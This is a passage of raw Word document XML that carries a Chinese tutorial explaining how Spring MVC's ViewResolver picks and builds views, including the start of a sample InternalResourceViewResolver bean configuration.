          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，当</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将请求处理结果放入到</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中以后，</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>选择合适的视图进行渲染。那么在</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中是如何选择合适的</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象是是如何创建的呢？答案就在</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口定义了</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>resolverViewName</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法，根据</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>viewName</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建合适类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRPr="007C427D" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>那么，如何配置</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>呢？在</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存在，可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置文件中进行配置，例如下面的代码，配置了</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>viewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="9"/>
          <w:szCs w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="9"/>
          <w:szCs w:val="9"/>
        </w:rPr>
        <w:t>[xhtml]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="9"/>
          <w:szCs w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId238" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="9"/>
            <w:szCs w:val="9"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId239" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="9"/>
            <w:szCs w:val="9"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comments"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;!-- Resolves view names to protected .jsp resources within the /WEB-INF/views directory --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag-name"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute-value"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"org.springframework.web.servlet.view.InternalResourceViewResolver"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
